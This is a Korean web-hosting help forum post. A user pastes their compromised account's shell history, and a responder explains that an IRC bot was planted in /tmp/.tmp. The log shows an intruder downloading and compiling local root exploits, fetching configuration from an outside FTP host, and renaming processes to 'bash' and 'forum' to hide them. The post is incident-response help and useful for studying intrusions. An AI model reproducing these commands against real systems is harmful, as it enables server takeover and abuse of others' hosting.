해킹 당한것같습니다. 내용 좀 봐주세요.

은하수님. 크래킹 당하신 것이 맞구요.
일단 계정이 아닌 /tmp 디렉토리에 .tmp라는 디렉토리 이름으로
파일이 존재할 것입니다. IRC(Internet Relay Chat)라는 이름을 가진 프로그램을
이용할 수 있는 Proxy나 혹은 IRC - Bot이라는 것이구요. 요즘 국내에 종종
발견되는 것이 IRC를 이용한 명령을 수행 할 수 있는 프로그램이 나와 문제가
되고 있습니다.

해당 데몬은 죽이시구요. 크래킹 경로가 정확하게 보드 종류에서 문제가 된 것인지
패스워드 유추에서 나온것인지 확실히 체크하셔서 막아주시기 바랍니다.

재발될 수 있는 문제가 있는 것이므로 /tmp디렉토리의 .tmp는 꼭 지워주세요


은하수 님의 글

계정 폴더에 이상한 파일들이 생겼습니다.
그리고 어떤 소스파일을 컴파일하여 계정권한으로 프로세스가 실행되고 있었습니다.
내용은 잘 모르겠으나 새로생긴 폴더가 2G 정도 용량을 차지하고 있었구요 알수없는 프로그램이 실행되고 있었던것도 불안하구요..

이하 내용은 계정 히스토리에 기록된 로그입니다.
어떤 내용인지 알수있을까요?

driveinfo
write 게정 /pts1
게정 pts/1
dir
cd /tmp/.tmp/.../rircd-ssl
dir
cd tools
dir
./mkpassword
./mkpasswd
./mkpasswd
./mkpasswd
./ircd
cd ..
./ircd
./mkpasswd
cd tools
./mkpasswd
./mkpasswd
dir
./mkpasswd
cd ..
./ircd
./ircd
pico ircd.conf
cat ircd.conf
cd tools
./mkpasswd
./mkpasswd
cd ..
./ircd
dir
./config
./ircd
make
./ircd
./ircd
cd /tmp.tmp/.../
cd /tmp.tmp/...
cd /tmp/.tmp/...
ls
./bash ngage.config
ls
cd ..
ls
ls -la
mkdir ....
cd ....
ls
kill -l
ps -fu root
netstat -l
find / -type f -perm -4000 -ls
find /usr/bin -type f -perm -4000 -ls
wget http://packetstormsecurity.com/0501-exploits/stackgrow2.c
gcc stackgrow2.c stack
gcc stackgrow2.c -o stack
chmod -c 755 stack
./stack
rm -rf *
ls
uname -a
wget http://packetstormsecurity.org/0501-exploits/uselib24.c
wget http://www.packetstormsecurity.org/0501-exploits/uselib24.c
gcc uselib24.c -o bash
ls
./bash
cd /tmp/.tmp/....
ls
./bash
ls
cd ..
ls -la
cd ...
ls
wget http://www.gower.net/unrealircd/Unreal3.2.2b.tar.gz
gunzip Unreal3.2.2b.tar.gz
tar xvf Unreal3.2.2b.tar
cd Unreal3.2
ls
./Config
make
ls
./unreal
./unreal start
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
./unreal start
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
rm -rf unrealircd.conf
mv unrealircd.conf.1 unrealircd.conf
./unreal start
rm -rf unrealircd.conf
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
./unreal start
rm -rf unrealircd.conf
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
./unreal start
rm -rf unrealircd.conf
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
./unreal start
rm -rf unrealircd.conf
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
mv unreal bash
./bash start
w
exit
mysql -u 게정 -p DB
cd /home/게정/public_html/image/
cd /_notes/images/
cd _notes/images/
./configure
configure
.configue
./unreal start
rm -rf unrealircd.conf
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
./unreal start
rm -rf unrealircd.conf
wget ftp://exploit:exploit@www.uxge.com:3112/unrealircd.conf
mv unreal bash
./bash start
w
exit
mysql -u 계정 -p DB
cd /home/계정/public_html/image/
cd /_notes/images/
cd _notes/images/
./configure
configure
.configue
.configue
./config
./Configure
./Configure[images]$ ./Configure
-bash: ./Configure: Permission denied
[images]$ ./Configure
make
cd /home/계정/public_html/image/_notes/images/xdcc.config
cd /home/계정/public_html/image/_notes/images
make
makefile
make
[images]$ make
make: *** No targets specified and no makefile found.  Stop.
[images]$
df
uptime
ls
adduser
./adduser
root
cd public_html
ls
cd /home/계정/만들어진 폴더/
wget http://64.84.10.70/download/Unreal3.2.2b.tar.gz
tar -zxvf Unreal3.2.2b.tar.gz
cd Unreal3.2
cd .
cd ...
cd ..
cd img
./Config
./Config
make
./forum start
./forum start
./forum start
ifconfig
ps x
kill -9 17479
./forum start
ps x
kill -9 17498
cd /tmp/.tmp/.../Unreal3.2
ls
pico unrealircd.conf
cd ..
ps x
cd ..
cd ..
cd ..
cd home
ls
cd /home/계정/만들어진 폴더/
ls
cd ..
ls
rm -rf img
wget http://iroffer.org/archive/v1.3/iroffer1.3.b10.tgz
tar -zxvf iroffer1.3.b10.tgz
cd img
ls
./configure
./Configure
make
./forum ir.conf
cd /만들어진 폴더/
./forum
./forum -b ir.conf
cd /만들어진 폴더/
./forum ip.conf
cd /만들어진 폴더/
./forum ip.conf